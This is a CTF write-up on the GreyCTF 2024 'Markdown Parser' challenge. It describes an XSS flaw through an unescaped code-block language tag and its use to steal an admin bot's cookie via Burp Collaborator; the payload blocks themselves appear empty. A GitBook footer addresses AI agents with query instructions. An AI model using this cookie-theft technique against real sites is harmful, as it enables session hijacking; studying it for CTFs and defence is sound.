> For the complete documentation index, see [llms.txt](https://kabinet.gitbook.io/ctf-writeup/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kabinet.gitbook.io/ctf-writeup/2024/greyctf-2024/markdown-parser.md). # Markdown Parser ## Challenge Description I built this simple markdown parser. Please give me some feedback (in markdown), I promise to read them all. Current features include: bold, italics, code blocks with syntax highlighting! Author: ocean *** ## Code Analysis Looking at the site, it seems to be relatively straight forward, just a markdown parser.

Markdown parser is known to be vulnerable to XSS without proper sanitization and escaping, as it reflects your input, as shown below.

Looking at the code where they parses the markdown.

We can see that they check if its a codeblock as indicated by ` ``` ` If its a code block, it will append the language onto the htmlOutput. Note that they also attempt to perform sanitization through the `escapeHtml` function if it is not in a code block.

The function replaced ampersand, greater than, lower than, double quotes, and single quotes with their respective HTML entity codes. However, in line 18, we noticed that the language was appended onto the htmlOutput without any escaping.

After parsing the markdown, we can then submit the Markdown to the admin bot at `/feedback` endpoint. Now that we have dissected the application, we are able to attempt to exploit the potential cross site scripting that was identified. *** ## Exploit Firstly, we used `` as a proof of concept that we are able to perform XSS. {% code title="Payload" %} ````javascript ```"> ```` {% endcode %}

We are able to get the XSS working. So lets modify our payload to try and steal the admin cookie. {% code title="Payload" overflow="wrap" %} ````javascript ```"> ```` I used BurpSuite collaborator to receive the request, and BurpSuite repeater the send it.

After waiting for a bit, I managed to receive the request to collaborator, and able to retrieve the flag successfully.

Flag: grey{m4rkd0wn\_th1s\_fl4g} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://kabinet.gitbook.io/ctf-writeup/2024/greyctf-2024/markdown-parser.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.